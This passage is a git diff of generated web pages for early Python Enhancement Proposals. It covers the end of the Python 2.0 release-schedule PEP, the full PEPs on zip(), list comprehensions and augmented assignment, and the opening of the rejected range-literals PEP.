We need to resolve errors in the regression test suite quickly. +Changes should not be committed to the CVS tree unless the regression +test runs cleanly with the changes applied. If it fails, there may be +bugs lurking in the code. (There may be bugs anyway, but that’s +another matter.) If the test cases are known to fail, they serve no +useful purpose.

+
test case         platform    date reported
+---------         --------    -------------
+test_mmap         Win ME      03-Sep-2000       Windows 2b1p2 prelease
+    [04-Sep-2000 tim
+     reported by Audun S. Runde mailto:audun@mindspring.com
+     the mmap constructor fails w/
+        WindowsError: [Errno 6] The handle is invalid
+     since there are no reports of this failing on other
+     flavors of Windows, this looks like to be an ME bug
+    ]
+
+
+
+
+

Open items – Need to be resolved before 2.0 final release

+

Decide whether cycle-gc should be enabled by default.

+

Resolve compatibility issues between core xml package and the XML-SIG +XML package.

+

Update Tools/compiler so that it is compatible with list +comprehensions, import as, and any other new language features.

+

Improve code coverage of test suite.

+

Finish writing the PEPs for the features that went out with 2.0b1 (! sad, but realistic - we’ll get better with practice).

+

Major effort to whittle the bug database down to size. I’ve (tim) +seen this before: if you can keep all the open bugs fitting on one +screen, people will generally keep it that way. But let it slobber +over a screen for a month, & it just goes to hell (no “visible +progress” indeed!).

+
+
+

Accepted and in progress

+
    +
  • Currently none left. [4-Sep-2000 guido]
  • +
+
+
+

Open: proposed but not accepted or rejected

+
    +
  • There are a number of open patches again. We need to clear these +out soon.
  • +
+
+
+

Previously failing test cases

+

If you find a test bouncing between this section and the previous one, +the code it’s testing is in trouble!

+
test case         platform    date reported
+---------         --------    -------------
+test_fork1        Linux       26-Jul-2000
+    [28-aug-2000 fixed by cgw; solution is to create copies of
+    lock in child process]
+    [19-Aug-2000 tim
+     Charles Waldman whipped up a patch to give child processes a new
+     "global lock":
+     http://sourceforge.net/patch/?func=detailpatch&patch_id=101226&group_id=5470
+     While this doesn't appear to address the symptoms we *saw*, it
+     *does* so far appear to be fixing the failing cases anyway
+    ]
+
+test_parser       all         22-Aug-2000
+test_posixpath    all         22-Aug-2000
+
+test_popen2       Win32       26-Jul-2000
+    [31-Aug-2000 tim
+     This died again, but for an entirely different reason:  it uses a
+     dict to map file pointers to process handles, and calls a dict
+     access function during popen.close().  But .close releases threads,
+     which left the internal popen code accessing the dict without a
+     valid thread state.  The dict implementation changed so that's no
+     longer accepted.  Fixed by creating a temporary thread state in the
+     guts of popen's close routine, and grabbing the global lock with
+     it for the duration]
+    [20-Aug-2000 tim
+     changed the popen2.py _test function to use the "more" cmd
+     when os.name == "nt".  This makes test_popen2 pass under
+     Win98SE.
+     HOWEVER, the Win98 "more" invents a leading newline out
+     of thin air, and I'm not sure that the other Windows flavors
+     of "more" also do that.
+     So, somebody please try under other Windows flavors!
+    ]
+    [still fails 15-Aug-2000 for me, on Win98 - tim
+         test test_popen2 crashed -- exceptions.AssertionError :
+     The problem is that the test uses "cat", but there is
+     no such thing under Windows (unless you install it).
+     So it's the test that's broken here, not (necessarily)
+     the code.
+    ]
+
+test_winreg        Win32      26-Jul-2000
+    [works 15-Aug-2000 for me, on Win98 - tim]
+
+test_mmap          Win32      26-Jul-2000
+    [believe that was fixed by Mark H.]
+    [works 15-Aug-2000 for me, on Win98 - tim]
+
+test_longexp      Win98+?     15-Aug-2000
+    [fails in release build,
+     passes in release build under verbose mode but doesn't
+         look like it should pass,
+     passes in debug build,
+     passes in debug build under verbose mode and looks like
+         it should pass
+    ]
+    [18-Aug-2000, tim:  can't reproduce, and nobody else
+     saw it.  I believe there *is* a subtle bug in
+     regrtest.py when using -v, and I'll pursue that,
+     but can't provoke anything wrong with test_longexp
+     anymore; eyeballing Fred's changes didn't turn up
+     a suspect either
+     19-Aug-2000, tim: the "subtle bug" in regrtest.py -v is
+     actually a feature:  -v masks *some* kinds of failures,
+     since it doesn't compare test output with the canned
+     output; this is what makes it say "test passed" even
+     in some cases where the test fails without -v
+    ]
+
+test_winreg2      Win32       26-Jul-2000
+    [20-Aug-2000 tim - the test has been removed from the project]
+    [19-Aug-2000 tim
+     This test will never work on Win98, because it's looking for
+     a part of registry that doesn't exist under W98.
+     The module (winreg.py) and this test case will be removed
+     before 2.0 for other reasons, though.
+    ]
+    [still fails 15-Aug-2000 for me, on Win98 - tim
+     test test_winreg2 failed -- Writing: 'Test Failed: testHives',
+     expected: 'HKEY_PERFORMANCE_DATA\012'
+    ]
+
+
+
+
+

Open items – completed/fixed

+
[4-Sep-2000 guido: Fredrik finished this on 1-Sep]
+* PyErr_Format - Fredrik Lundh
+  Make this function safe from buffer overflows.
+
+[4-Sep-2000 guido: Fred has added popen2, popen3 on 28-Sep]
+Add popen2 support for Linux -- Fred Drake
+
+[4-Sep-2000 guido: done on 1-Sep]
+Deal with buffering problem with SocketServer
+
+[04-Sep-2000 tim:  done; installer runs; w9xpopen not an issue]
+[01-Sep-2000 tim:  make a prerelease available]
+Windows ME:  Don't know anything about it.  Will the installer
+even run?  Does it need the w9xpopen hack?
+
+[04-Sep-2000 tim:  done; tested on several Windows flavors now]
+[01-Sep-2000 tim:  completed but untested except on Win98SE]
+Windows installer:  If HKLM isn't writable, back off to HKCU (so
+Python can be installed on NT & 2000 without admin privileges).
+
+[01-Sep-2000 tim - as Guido said, runtime code in posixmodule.c doesn't
+ call this on NT/2000, so no need to avoid installing it everywhere.
+ Added code to the installer *to* install it, though.]
+ call this on NT/2000, so no need to avoid installing it everywhere.
+ Added code to the installer *to* install it, though.]
+Windows installer:  Install w9xpopen.exe only under Win95/98.
+
+[23-Aug-2000 jeremy - tim reports "completed recently"]
+Windows:  Look for registry info in HKCU before HKLM - Mark
+Hammond.
+
+[20-Aug-2000 tim - done]
+Remove winreg.py and test_winreg2.py.  Paul Prescod (the author)
+now wants to make a registry API more like the MS .NET API.  Unclear
+whether that can be done in time for 2.0, but, regardless, if we
+let winreg.py out the door we'll be stuck with it forever, and not
+even Paul wants it anymore.
+
+[24-Aug-2000 tim+guido - done]
+Win98 Guido:  popen is hanging on Guido, and even freezing the
+whole machine.  Was caused by Norton Antivirus 2000 (6.10.20) on
+Windows 9x.  Resolution: disable virus protection.
+
+
+
+
+

Accepted and completed

+
    +
• Change meaning of \x escapes - PEP 223 - Fredrik Lundh
  • +
• Add \U1234678 escapes in u”” strings - Fredrik Lundh
  • +
  • Support for opcode arguments > 2**16 - Charles Waldman SF Patch +100893
  • +
  • “import as” - Thomas Wouters Extend the ‘import’ and ‘from … +import’ mechanism to enable importing a symbol as another name. +(Without adding a new keyword.)
  • +
  • List comprehensions - Skip Montanaro Tim Peters still needs to do +PEP.
  • +
  • Restore old os.path.commonprefix behavior Do we have test cases that +work on all platforms?
  • +
  • Tim O’Malley’s cookie module with good license
  • +
  • Lockstep iteration (“zip” function) - Barry Warsaw
  • +
  • SRE - Fredrik Lundh [at least I think it’s done, as of +15-Aug-2000 - tim]
  • +
  • Fix xrange printing behavior - Fred Drake Remove the tp_print +handler for the xrange type; it produced a list display instead of +‘xrange(…)’. The new code produces a minimal call to xrange(), +enclosed in (... * N) when N != 1. This makes the repr() more +human readable while making it do what reprs are advertised as +doing. It also makes the xrange objects obvious when working in the +interactive interpreter.
  • +
  • Extended print statement - Barry Warsaw PEP 214 +SF Patch #100970 +http://sourceforge.net/patch/?func=detailpatch&patch_id=100970&group_id=5470
  • +
  • interface to poll system call - Andrew Kuchling SF Patch 100852
  • +
  • Augmented assignment - Thomas Wouters Add += and family, plus Python +and C hooks, and API functions.
  • +
  • gettext.py module - Barry Warsaw
  • +
+
+
+

Postponed

+
    +
  • Extended slicing on lists - Michael Hudson Make lists (and other +builtin types) handle extended slices.
  • +
  • Compression of Unicode database - Fredrik Lundh SF Patch 100899 At +least for 2.0b1. May be included in 2.0 as a bug fix.
  • +
  • Range literals - Thomas Wouters SF Patch 100902 We ended up having a +lot of doubt about the proposal.
  • +
  • Eliminated SET_LINENO opcode - Vladimir Marangozov Small +optimization achieved by using the code object’s lnotab instead of +the SET_LINENO instruction. Uses code rewriting technique (that +Guido’s frowns on) to support debugger, which uses SET_LINENO.

    http://starship.python.net/~vlad/lineno/ for (working at the time) +patches

    +

    Discussions on python-dev:

    + +
  • +
  • test harness for C code - Trent Mick
  • +
+
+
+

Rejected

+
    +
  • ‘indexing-for’ - Thomas Wouters Special syntax to give Python code +access to the loop-counter in ‘for’ loops. (Without adding a new +keyword.)
  • +
+
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0200.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
\ No newline at end of file diff --git a/pep-0201/index.html b/pep-0201/index.html new file mode 100644 index 00000000000..772c4107482 --- /dev/null +++ b/pep-0201/index.html @@ -0,0 +1,400 @@ PEP 201 – Lockstep Iteration | peps.python.org
+
+


+ + +
+
+
+

PEP 201 – Lockstep Iteration

+
+
Author:
+
Barry Warsaw <barry at python.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
13-Jul-2000
+
Python-Version:
+
2.0
+
Post-History:
+
27-Jul-2000
+
+
+
+
+
+

Introduction

+

This PEP describes the ‘lockstep iteration’ proposal. This PEP tracks +the status and ownership of this feature, slated for introduction in +Python 2.0. It contains a description of the feature and outlines +changes necessary to support the feature. This PEP summarizes +discussions held in mailing list forums, and provides URLs for further +information, where appropriate. The CVS revision history of this file +contains the definitive historical record.

+
+
+

Motivation

+

Standard for-loops in Python iterate over every element in a sequence +until the sequence is exhausted [1]. However, for-loops iterate over +only a single sequence, and it is often desirable to loop over more +than one sequence in a lock-step fashion. In other words, in a way +such that the i-th iteration through the loop returns an object +containing the i-th element from each sequence.

+

The common idioms used to accomplish this are unintuitive. This PEP +proposes a standard way of performing such iterations by introducing a +new builtin function called zip.

+

While the primary motivation for zip() comes from lock-step iteration, +by implementing zip() as a built-in function, it has additional +utility in contexts other than for-loops.

+
+
+

Lockstep For-Loops

+

Lockstep for-loops are non-nested iterations over two or more +sequences, such that at each pass through the loop, one element from +each sequence is taken to compose the target. This behavior can +already be accomplished in Python through the use of the map() built-in +function:

+
>>> a = (1, 2, 3)
+>>> b = (4, 5, 6)
+>>> for i in map(None, a, b): print i
+...
+(1, 4)
+(2, 5)
+(3, 6)
+>>> map(None, a, b)
+[(1, 4), (2, 5), (3, 6)]
+
+
+

The for-loop simply iterates over this list as normal.

+

While the map() idiom is a common one in Python, it has several +disadvantages:

+
    +
  • It is non-obvious to programmers without a functional programming +background.
  • +
  • The use of the magic None first argument is non-obvious.
  • +
  • It has arbitrary, often unintended, and inflexible semantics when +the lists are not of the same length: the shorter sequences are +padded with None:
    >>> c = (4, 5, 6, 7)
    +>>> map(None, a, c)
    +[(1, 4), (2, 5), (3, 6), (None, 7)]
    +
    +
    +
  • +
+

For these reasons, several proposals were floated in the Python 2.0 +beta time frame for syntactic support of lockstep for-loops. Here are +two suggestions:

+
for x in seq1, y in seq2:
+  # stuff
+
+
+
for x, y in seq1, seq2:
+  # stuff
+
+
+

Neither of these forms would work, since they both already mean something in Python and changing the meanings would break existing code. All other suggestions for new syntax suffered the same problem, or were in conflict with another proposed feature called ‘list comprehensions’ (see PEP 202).

+
+
+

The Proposed Solution

+

The proposed solution is to introduce a new built-in sequence +generator function, available in the __builtin__ module. This +function is to be called zip and has the following signature:

+
zip(seqa, [seqb, [...]])
+
+
+

zip() takes one or more sequences and weaves their elements +together, just as map(None, ...) does with sequences of equal +length. The weaving stops when the shortest sequence is exhausted.

+
+
+

Return Value

+

zip() returns a real Python list, the same way map() does.

+
+
+

Examples

+

Here are some examples, based on the reference implementation below:

+
>>> a = (1, 2, 3, 4)
+>>> b = (5, 6, 7, 8)
+>>> c = (9, 10, 11)
+>>> d = (12, 13)
+
+>>> zip(a, b)
+[(1, 5), (2, 6), (3, 7), (4, 8)]
+
+>>> zip(a, d)
+[(1, 12), (2, 13)]
+
+>>> zip(a, b, c, d)
+[(1, 5, 9, 12), (2, 6, 10, 13)]
+
+
+

Note that when the sequences are of the same length, zip() is +reversible:

+
>>> a = (1, 2, 3)
+>>> b = (4, 5, 6)
+>>> x = zip(a, b)
+>>> y = zip(*x) # alternatively, apply(zip, x)
+>>> z = zip(*y) # alternatively, apply(zip, y)
+>>> x
+[(1, 4), (2, 5), (3, 6)]
+>>> y
+[(1, 2, 3), (4, 5, 6)]
+>>> z
+[(1, 4), (2, 5), (3, 6)]
+>>> x == z
+1
+
+
+

It is not possible to reverse zip this way when the sequences are not +all the same length.

+
+
+

Reference Implementation

+

Here is a reference implementation, in Python, of the zip() built-in function. It will be replaced with a C implementation after final approval:

+
def zip(*args):
+    if not args:
+        raise TypeError('zip() expects one or more sequence arguments')
+    ret = []
+    i = 0
+    try:
+        while 1:
+            item = []
+            for s in args:
+                item.append(s[i])
+            ret.append(tuple(item))
+            i = i + 1
+    except IndexError:
+        return ret
+
+
+
+
+

BDFL Pronouncements

+

Note: the BDFL refers to Guido van Rossum, Python’s Benevolent +Dictator For Life.

+
    +
  • The function’s name. An earlier version of this PEP included an +open issue listing 20+ proposed alternative names to zip(). In +the face of no overwhelmingly better choice, the BDFL strongly +prefers zip() due to its Haskell [2] heritage. See version 1.7 +of this PEP for the list of alternatives.
  • +
  • zip() shall be a built-in function.
  • +
  • Optional padding. An earlier version of this PEP proposed an +optional pad keyword argument, which would be used when the +argument sequences were not the same length. This is similar +behavior to the map(None, ...) semantics except that the user +would be able to specify pad object. This has been rejected by the +BDFL in favor of always truncating to the shortest sequence, because +of the KISS principle. If there’s a true need, it is easier to add +later. If it is not needed, it would still be impossible to delete +it in the future.
  • +
  • Lazy evaluation. An earlier version of this PEP proposed that +zip() return a built-in object that performed lazy evaluation +using __getitem__() protocol. This has been strongly rejected +by the BDFL in favor of returning a real Python list. If lazy +evaluation is desired in the future, the BDFL suggests an xzip() +function be added.
  • +
  • zip() with no arguments. the BDFL strongly prefers this raise a +TypeError exception.
  • +
  • zip() with one argument. the BDFL strongly prefers that this +return a list of 1-tuples.
  • +
  • Inner and outer container control. An earlier version of this PEP +contains a rather lengthy discussion on a feature that some people +wanted, namely the ability to control what the inner and outer +container types were (they are tuples and list respectively in this +version of the PEP). Given the simplified API and implementation, +this elaboration is rejected. For a more detailed analysis, see +version 1.7 of this PEP.
  • +
+
+
+

Subsequent Change to zip()

+

In Python 2.4, zip() with no arguments was modified to return an empty +list rather than raising a TypeError exception. The rationale for the +original behavior was that the absence of arguments was thought to +indicate a programming error. However, that thinking did not +anticipate the use of zip() with the * operator for unpacking +variable length argument lists. For example, the inverse of zip could +be defined as: unzip = lambda s: zip(*s). That transformation +also defines a matrix transpose or an equivalent row/column swap for +tables defined as lists of tuples. The latter transformation is +commonly used when reading data files with records as rows and fields +as columns. For example, the code:

+
date, rain, high, low = zip(*csv.reader(file("weather.csv")))
+
+
+

rearranges columnar data so that each field is collected into +individual tuples for straightforward looping and summarization:

+
print "Total rainfall", sum(rain)
+
+
+

Using zip(*args) is more easily coded if zip(*[]) is handled +as an allowable case rather than an exception. This is especially +helpful when data is either built up from or recursed down to a null +case with no records.

+

Seeing this possibility, the BDFL agreed (with some misgivings) to +have the behavior changed for Py2.4.

+
+
+

Other Changes

+
    +
  • The xzip() function discussed above was implemented in Py2.3 in +the itertools module as itertools.izip(). This function +provides lazy behavior, consuming single elements and producing a +single tuple on each pass. The “just-in-time” style saves memory +and runs faster than its list based counterpart, zip().
  • +
  • The itertools module also added itertools.repeat() and +itertools.chain(). These tools can be used together to pad +sequences with None (to match the behavior of map(None, +seqn)):
    zip(firstseq, chain(secondseq, repeat(None)))
    +
    +
    +
  • +
+
+
+

References

+ +

Greg Wilson’s questionnaire on proposed syntax to some CS grad students +http://www.python.org/pipermail/python-dev/2000-July/013139.html

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0201.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
\ No newline at end of file diff --git a/pep-0202/index.html b/pep-0202/index.html new file mode 100644 index 00000000000..34e1056d4d7 --- /dev/null +++ b/pep-0202/index.html @@ -0,0 +1,203 @@ PEP 202 – List Comprehensions | peps.python.org
+
+


+ + +
+
+
+

PEP 202 – List Comprehensions

+
+
Author:
+
Barry Warsaw <barry at python.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
13-Jul-2000
+
Python-Version:
+
2.0
+
Post-History:
+

+
+
+
+
+
+

Introduction

+

This PEP describes a proposed syntactical extension to Python, list +comprehensions.

+
+
+

The Proposed Solution

+

It is proposed to allow conditional construction of list literals using for and +if clauses. They would nest in the same way for loops and if statements nest +now.

+
+
+

Rationale

+

List comprehensions provide a more concise way to create lists in situations +where map() and filter() and/or nested loops would currently be used.

+
+
+

Examples

+
>>> print [i for i in range(10)]
+[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
+
+>>> print [i for i in range(20) if i%2 == 0]
+[0, 2, 4, 6, 8, 10, 12, 14, 16, 18]
+
+>>> nums = [1, 2, 3, 4]
+>>> fruit = ["Apples", "Peaches", "Pears", "Bananas"]
+>>> print [(i, f) for i in nums for f in fruit]
+[(1, 'Apples'), (1, 'Peaches'), (1, 'Pears'), (1, 'Bananas'),
+ (2, 'Apples'), (2, 'Peaches'), (2, 'Pears'), (2, 'Bananas'),
+ (3, 'Apples'), (3, 'Peaches'), (3, 'Pears'), (3, 'Bananas'),
+ (4, 'Apples'), (4, 'Peaches'), (4, 'Pears'), (4, 'Bananas')]
+>>> print [(i, f) for i in nums for f in fruit if f[0] == "P"]
+[(1, 'Peaches'), (1, 'Pears'),
+ (2, 'Peaches'), (2, 'Pears'),
+ (3, 'Peaches'), (3, 'Pears'),
+ (4, 'Peaches'), (4, 'Pears')]
+>>> print [(i, f) for i in nums for f in fruit if f[0] == "P" if i%2 == 1]
+[(1, 'Peaches'), (1, 'Pears'), (3, 'Peaches'), (3, 'Pears')]
+>>> print [i for i in zip(nums, fruit) if i[0]%2==0]
+[(2, 'Peaches'), (4, 'Bananas')]
+
+
+
+
+

Reference Implementation

+

List comprehensions become part of the Python language with release 2.0, +documented in [1].

+
+
+

BDFL Pronouncements

+
    +
  • The syntax proposed above is the Right One.
  • +
  • The form [x, y for ...] is disallowed; one is required to write +[(x, y) for ...].
  • +
  • The form [... for x... for y...] nests, with the last index +varying fastest, just like nested for loops.
  • +
+
+
+

References

+ +
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0202.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
\ No newline at end of file diff --git a/pep-0203/index.html b/pep-0203/index.html new file mode 100644 index 00000000000..123fc3de96a --- /dev/null +++ b/pep-0203/index.html @@ -0,0 +1,421 @@ PEP 203 – Augmented Assignments | peps.python.org
+
+


+ + +
+
+
+

PEP 203 – Augmented Assignments

+
+
Author:
+
Thomas Wouters <thomas at python.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
13-Jul-2000
+
Python-Version:
+
2.0
+
Post-History:
+
14-Aug-2000
+
+
+
+
+
+

Introduction

+

This PEP describes the augmented assignment proposal for Python 2.0. This +PEP tracks the status and ownership of this feature, slated for introduction +in Python 2.0. It contains a description of the feature and outlines changes +necessary to support the feature. This PEP summarizes discussions held in +mailing list forums [1], and provides URLs for further information where +appropriate. The CVS revision history of this file contains the definitive +historical record.

+
+
+

Proposed Semantics

+

The proposed patch that adds augmented assignment to Python introduces the +following new operators:

+
+= -= *= /= %= **= <<= >>= &= ^= |=
+
+
+

They implement the same operator as their normal binary form, except that the +operation is done in-place when the left-hand side object supports it, and +that the left-hand side is only evaluated once.

+

They truly behave as augmented assignment, in that they perform all of the +normal load and store operations, in addition to the binary operation they are +intended to do. So, given the expression:

+
x += y
+
+
+

The object x is loaded, then y is added to it, and the resulting +object is stored back in the original place. The precise action performed on +the two arguments depends on the type of x, and possibly of y.

+

The idea behind augmented assignment in Python is that it isn’t just an easier +way to write the common practice of storing the result of a binary operation +in its left-hand operand, but also a way for the left-hand operand in question +to know that it should operate on itself, rather than creating a modified +copy of itself.

+

To make this possible, a number of new hooks are added to Python classes and +C extension types, which are called when the object in question is used as the +left hand side of an augmented assignment operation. If the class or type +does not implement the in-place hooks, the normal hooks for the particular +binary operation are used.

+

So, given an instance object x, the expression:

+
x += y
+
+
+

tries to call x.__iadd__(y), which is the in-place variant of __add__. If __iadd__ is not present, x.__add__(y) is attempted, and finally y.__radd__(x) if __add__ is missing too. There is no right-hand-side variant of __iadd__, because that would require y to know how to modify x in-place, which is unsafe to say the least. The __iadd__ hook should behave similarly to __add__, returning the result of the operation (which could be self), which is to be assigned to the variable x.

+

For C extension types, the hooks are members of the PyNumberMethods and +PySequenceMethods structures. Some special semantics apply to make the +use of these methods, and the mixing of Python instance objects and C types, +as unsurprising as possible.

+

In the generic case of x <augop> y (or a similar case using the +PyNumber_InPlace API functions) the principal object being operated on is +x. This differs from normal binary operations, where x and y +could be considered co-operating, because unlike in binary operations, the +operands in an in-place operation cannot be swapped. However, in-place +operations do fall back to normal binary operations when in-place modification +is not supported, resulting in the following rules:

+
    +
  • If the left-hand object (x) is an instance object, and it has a +__coerce__ method, call that function with y as the argument. If +coercion succeeds, and the resulting left-hand object is a different object +than x, stop processing it as in-place and call the appropriate function +for the normal binary operation, with the coerced x and y as +arguments. The result of the operation is whatever that function returns.

    If coercion does not yield a different object for x, or x does not +define a __coerce__ method, and x has the appropriate __ihook__ +for this operation, call that method with y as the argument, and the +result of the operation is whatever that method returns.

    +
  • +
  • Otherwise, if the left-hand object is not an instance object, but its type +does define the in-place function for this operation, call that function +with x and y as the arguments, and the result of the operation is +whatever that function returns.

    Note that no coercion on either x or y is done in this case, and +it’s perfectly valid for a C type to receive an instance object as the +second argument; that is something that cannot happen with normal binary +operations.

    +
  • +
  • Otherwise, process it exactly as a normal binary operation (not in-place), +including argument coercion. In short, if either argument is an instance +object, resolve the operation through __coerce__, __hook__ and +__rhook__. Otherwise, both objects are C types, and they are coerced +and passed to the appropriate function.
  • +
  • If no way to process the operation can be found, raise a TypeError with +an error message specific to the operation.
  • +
• Some special casing exists to account for the case of + and *, which have a special meaning for sequences: for +, sequence concatenation, no coercion whatsoever is done if a C type defines sq_concat or sq_inplace_concat. For *, sequence repeating, y is converted to a C integer before calling either sq_inplace_repeat or sq_repeat. This is done even if y is an instance, though not if x is an instance.
  • +
+

The in-place function should always return a new reference, either to the +old x object if the operation was indeed performed in-place, or to a new +object.

+
+
+

Rationale

+

There are two main reasons for adding this feature to Python: simplicity of +expression, and support for in-place operations. The end result is a tradeoff +between simplicity of syntax and simplicity of expression; like most new +features, augmented assignment doesn’t add anything that was previously +impossible. It merely makes these things easier to do.

+

Adding augmented assignment will make Python’s syntax more complex. Instead +of a single assignment operation, there are now twelve assignment operations, +eleven of which also perform a binary operation. However, these eleven new +forms of assignment are easy to understand as the coupling between assignment +and the binary operation, and they require no large conceptual leap to +understand. Furthermore, languages that do have augmented assignment have +shown that they are a popular, much used feature. Expressions of the form:

+
<x> = <x> <operator> <y>
+
+
+

are common enough in those languages to make the extra syntax worthwhile, and +Python does not have significantly fewer of those expressions. Quite the +opposite, in fact, since in Python you can also concatenate lists with a +binary operator, something that is done quite frequently. Writing the above +expression as:

+
<x> <operator>= <y>
+
+
+

is both more readable and less error prone, because it is instantly obvious to +the reader that it is <x> that is being changed, and not <x> that is +being replaced by something almost, but not quite, entirely unlike <x>.

+

The new in-place operations are especially useful to matrix calculation and +other applications that require large objects. In order to efficiently deal +with the available program memory, such packages cannot blindly use the +current binary operations. Because these operations always create a new +object, adding a single item to an existing (large) object would result in +copying the entire object (which may cause the application to run out of +memory), add the single item, and then possibly delete the original object, +depending on reference count.

+

To work around this problem, the packages currently have to use methods or +functions to modify an object in-place, which is definitely less readable than +an augmented assignment expression. Augmented assignment won’t solve all the +problems for these packages, since some operations cannot be expressed in the +limited set of binary operators to start with, but it is a start. PEP 211 +is looking at adding new operators.

+
+
+

New methods

+

The proposed implementation adds the following 11 possible hooks which +Python classes can implement to overload the augmented assignment operations:

+
__iadd__
+__isub__
+__imul__
+__idiv__
+__imod__
+__ipow__
+__ilshift__
+__irshift__
+__iand__
+__ixor__
+__ior__
+
+
+

The i in __iadd__ stands for in-place.

+

For C extension types, the following struct members are added.

+

To PyNumberMethods:

+
binaryfunc nb_inplace_add;
+binaryfunc nb_inplace_subtract;
+binaryfunc nb_inplace_multiply;
+binaryfunc nb_inplace_divide;
+binaryfunc nb_inplace_remainder;
+binaryfunc nb_inplace_power;
+binaryfunc nb_inplace_lshift;
+binaryfunc nb_inplace_rshift;
+binaryfunc nb_inplace_and;
+binaryfunc nb_inplace_xor;
+binaryfunc nb_inplace_or;
+
+
+

To PySequenceMethods:

+
binaryfunc sq_inplace_concat;
+intargfunc sq_inplace_repeat;
+
+
+

In order to keep binary compatibility, the tp_flags TypeObject member is +used to determine whether the TypeObject in question has allocated room for +these slots. Until a clean break in binary compatibility is made (which may +or may not happen before 2.0) code that wants to use one of the new struct +members must first check that they are available with the +PyType_HasFeature() macro:

+
if (PyType_HasFeature(x->ob_type, Py_TPFLAGS_HAVE_INPLACE_OPS) &&
+    x->ob_type->tp_as_number && x->ob_type->tp_as_number->nb_inplace_add) {
+        /* ... */
+
+
+

This check must be made even before testing the method slots for NULL +values! The macro only tests whether the slots are available, not whether +they are filled with methods or not.

+
+
+

Implementation

+

The current implementation of augmented assignment [2] adds, in addition to +the methods and slots already covered, 13 new bytecodes and 13 new API +functions.

+

The API functions are simply in-place versions of the current binary-operation +API functions:

+
PyNumber_InPlaceAdd(PyObject *o1, PyObject *o2);
+PyNumber_InPlaceSubtract(PyObject *o1, PyObject *o2);
+PyNumber_InPlaceMultiply(PyObject *o1, PyObject *o2);
+PyNumber_InPlaceDivide(PyObject *o1, PyObject *o2);
+PyNumber_InPlaceRemainder(PyObject *o1, PyObject *o2);
+PyNumber_InPlacePower(PyObject *o1, PyObject *o2);
+PyNumber_InPlaceLshift(PyObject *o1, PyObject *o2);
+PyNumber_InPlaceRshift(PyObject *o1, PyObject *o2);
+PyNumber_InPlaceAnd(PyObject *o1, PyObject *o2);
+PyNumber_InPlaceXor(PyObject *o1, PyObject *o2);
+PyNumber_InPlaceOr(PyObject *o1, PyObject *o2);
+PySequence_InPlaceConcat(PyObject *o1, PyObject *o2);
+PySequence_InPlaceRepeat(PyObject *o, int count);
+
+
+

They call either the Python class hooks (if either of the objects is a Python +class instance) or the C type’s number or sequence methods.
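At the Python level, the dispatch performed by, e.g., PyNumber_InPlaceAdd can be roughly modelled as follows; this is a simplified sketch, ignoring the NotImplemented and reflected-operand details of the real implementation:

def inplace_add(x, y):
    # Prefer the in-place hook if the type defines one; otherwise
    # fall back to the ordinary binary operation.
    hook = getattr(type(x), '__iadd__', None)
    if hook is not None:
        return hook(x, y)
    return x + y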

+

The new bytecodes are:

+
INPLACE_ADD
+INPLACE_SUBTRACT
+INPLACE_MULTIPLY
+INPLACE_DIVIDE
+INPLACE_REMAINDER
+INPLACE_POWER
+INPLACE_LEFTSHIFT
+INPLACE_RIGHTSHIFT
+INPLACE_AND
+INPLACE_XOR
+INPLACE_OR
+ROT_FOUR
+DUP_TOPX
+
+
+

The INPLACE_* bytecodes mirror the BINARY_* bytecodes, except that +they are implemented as calls to the InPlace API functions. The other two +bytecodes are utility bytecodes: ROT_FOUR behaves like ROT_THREE +except that the four topmost stack items are rotated.

+

DUP_TOPX is a bytecode that takes a single argument, which should be an +integer between 1 and 5 (inclusive), giving the number of items to duplicate +in one block. Given a stack like this (where the right side of the list is +the top of the stack):

+
[1, 2, 3, 4, 5]
+
+
+

DUP_TOPX 3 would duplicate the top 3 items, resulting in this stack:

+
[1, 2, 3, 4, 5, 3, 4, 5]
+
+
+

DUP_TOPX with an argument of 1 is the same as DUP_TOP. The limit of 5 +is purely an implementation limit. The implementation of augmented +assignment requires only DUP_TOPX with arguments of 2 and 3, and could +do without this new opcode at the cost of a fair number of DUP_TOP and +ROT_* opcodes.
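For illustration only, the stack effect of DUP_TOPX can be modelled with a plain Python list standing in for the value stack:

def dup_topx(stack, n):
    # Duplicate the top n items of the stack as a single block.
    assert 1 <= n <= 5          # the implementation limit mentioned above
    stack.extend(stack[-n:])

stack = [1, 2, 3, 4, 5]
dup_topx(stack, 3)
print(stack)   # prints [1, 2, 3, 4, 5, 3, 4, 5]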

+
+
+

Open Issues

+

The PyNumber_InPlace API is only a subset of the normal PyNumber API: +only those functions that are required to support the augmented assignment +syntax are included. If other in-place API functions are needed, they can be +added later.

+

The DUP_TOPX bytecode is a convenience bytecode, and is not actually +necessary. It should be considered whether this bytecode is worth having. +There seems to be no other possible use for this bytecode at this time.

+
+ +
+

References

+ +
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0203.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ \ No newline at end of file diff --git a/pep-0204/index.html b/pep-0204/index.html new file mode 100644 index 00000000000..61f4679c006 --- /dev/null +++ b/pep-0204/index.html @@ -0,0 +1,402 @@ + PEP 204 – Range Literals | peps.python.org +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 204 – Range Literals

+
+
Author:
+
Thomas Wouters <thomas at python.org>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
14-Jul-2000
+
Python-Version:
+
2.0
+
Post-History:
+

+
+
+
+
+
+

Warning

+

This PEP has been rejected.

+


+

After careful consideration, and a period of meditation, this +proposal has been rejected. The open issues, as well as some +confusion between ranges and slice syntax, raised enough questions +for Guido not to accept it for Python 2.0, and later to reject the +proposal altogether. The new syntax and its intentions were deemed +not obvious enough.

+

[ TBD: Guido, amend/confirm this, please. Preferably both; this +is a PEP, it should contain all the reasons for rejection +and/or reconsideration, for future reference. ]

+

+
+
+

Introduction

+

